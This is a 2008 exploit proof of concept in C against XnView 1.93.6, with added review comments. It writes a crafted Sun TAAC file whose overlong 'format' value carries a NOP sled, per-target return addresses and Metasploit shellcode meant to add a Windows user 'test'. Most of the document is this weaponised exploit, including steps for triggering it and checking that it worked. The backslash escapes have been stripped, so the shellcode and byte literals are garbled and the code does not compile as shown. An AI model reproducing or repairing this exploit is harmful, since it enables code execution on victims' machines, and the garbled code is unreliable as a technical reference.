
# Title : XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC
# Published : 2008-06-26
# Author : Shinnok


#include <stdio.h>
#include <stdlib.h>
/*
 XnView 1.93.6 for Windows .taac buffer overflow proof of concept.
 
The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discovered by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows 
will cause a buffer overflow and add a user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
*/

/* win32_adduser -  PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload bytes. The comment above attributes them to a Metasploit
 * "win32_adduser" payload (USER=test, PASS=test); their contents are not
 * decoded or verified on this page.
 * NOTE(review): the escape sequences have lost their backslashes in
 * extraction — the literals read "x2bxc9…" rather than byte escapes — so
 * as printed this array holds ASCII text, not the bytes the author meant. */
unsigned char scode[] =
"x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13xbf"
"x93x8fx1ex83xebxfcxe2xf4x43x7bxcbx1exbfx93x04x5b"
"x83x18xf3x1bxc7x92x60x95xf0x8bx04x41x9fx92x64x57"
"x34xa7x04x1fx51xa2x4fx87x13x17x4fx6axb8x52x45x13"
"xbex51x64xeax84xc7xabx1axcax76x04x41x9bx92x64x78"
"x34x9fxc4x95xe0x8fx8exf5x34x8fx04x1fx54x1axd3x3a"
"xbbx50xbexdexdbx18xcfx2ex3ax53xf7x12x34xd3x83x95"
"xcfx8fx22x95xd7x9bx64x17x34x13x3fx1exbfx93x04x76"
"x83xccxbexe8xdfxc5x06xe6x3cx53xf4x4exd7x63x05x1a"
"xe0xfbx17xe0x35x9dxd8xe1x58xf0xe2x7ax91xf6xf7x7b"
"x9fxbcxecx3exd1xf6xfbx3excaxe0xeax6cx9fxe7xeax6d"
"xcbxb3xfbx7bxccxe7xafx31xfexd7xcbx3ex99xb5xafx70"
"xdaxe7xafx72xd0xf0xeex72xd8xe1xe0x6bxcfxb3xcex7a"
"xd2xfaxe1x77xccxe7xfdx7fxcbxfcxfdx6dx9fxe7xeax6d"
"xcbxb3xa0x5fxfbxd7x8fx1e";


/* Per-target 4-byte values selected by argv[1] in main(); the usage text
 * labels target 0 as WinXP SP2 and target 1 as WinXP SP3. Whichever is
 * chosen is spliced between nops1 and nops2 inside the "format=" value
 * that main() writes to the file. Same stripped-escape caveat as scode. */
unsigned char ra_sp2[] = "xedx1ex94x7c";
unsigned char ra_sp3[] = "x83xbfx8ax5b";

/* Filler runs, populated by main() before the file is written; the extra
 * element of each is meant to hold the string terminator so that
 * fprintf("%s") can copy them as C strings. */
unsigned char nops1[257]; //256 * x90
unsigned char nops2[21]; //20 * x90

/*
 * Entry point: writes a crafted "sploit.taac" into the current directory.
 *
 * argv[1] selects the target (0 = WinXP SP2, 1 = WinXP SP3) and therefore
 * which of ra_sp2 / ra_sp3 is embedded. Returns EXIT_SUCCESS on both the
 * usage path and the normal path; no failure is ever reported to the caller.
 *
 * NOTE(review): as printed, the backslash escapes are missing ('x90', 'xa',
 * the empty '' constants and the "n" ending each message), so this listing
 * does not compile unchanged.
 *
 * For defenders: the file this produces is a TAAC header ("ncaa", rank,
 * bands, size) followed by a single "format=" line several hundred bytes
 * long, mostly filler; that overlong "format" value is presumably what
 * triggers the boundary error described in the Secunia advisory linked
 * above, and is the obvious thing to flag in a .taac file.
 */
int main(int argc, char **argv)
{
    int i;
    FILE* f;
    printf("[+] XnView 1.93.6 for Windows .taac buffer overflown");
	printf("[+] Discovered by Secunia : nhttp://secunia.com/secunia_research/2008-24/advisory/n");
	printf("[+] Coded by shinnok,greetz to escalation666.n http://www.rstcenter.com n");
    /* Usage check: exactly one argument that atoi() maps to 0 or 1.
     * atoi() returns 0 for any non-numeric string, so e.g. "abc" passes
     * here as target 0 rather than being rejected. */
    if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){
            printf("Usage: %s targetn",argv[0]);
            printf("Where target is:n");
            printf("0: WinXP SP2n");
            printf("1: WinXP SP3n");
            printf("Successfull exploitation will result in the adding of user "test" with password "test".n");
            return EXIT_SUCCESS;
    }
    /* Populate the two global filler runs and terminate them (see their
     * declarations above). */
    for(i=0;i<256;i++) nops1[i]='x90';
    nops1[256]='';
    for(i=0;i<14;i++) nops2[i]='x90';
    nops2[20]='';
    /* Both branches write an identical header; the only difference is the
     * 4-byte value (ra_sp2 vs ra_sp3) placed between nops1 and nops2 in the
     * "format=" line.
     * NOTE(review): the fopen() result is never checked — if the current
     * directory is not writable, f is NULL and fprintf() dereferences it. */
    if(atoi(argv[1])==0) {
        f=fopen("sploit.taac","wb");    
        fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'xa','xa','xa','xa');
        fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'xa');
    }else{
        f=fopen("sploit.taac","wb");    
        fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'xa','xa','xa','xa');
        fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'xa');               
    }                         
    /* fclose() return value is ignored; a short or failed write to the
     * output file goes unnoticed. */
    fclose(f);
    printf("sploit.taac created!n");
    printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.n");
    printf("Then check with "net user" or from control panel for the user account test.n");
    return EXIT_SUCCESS;
}
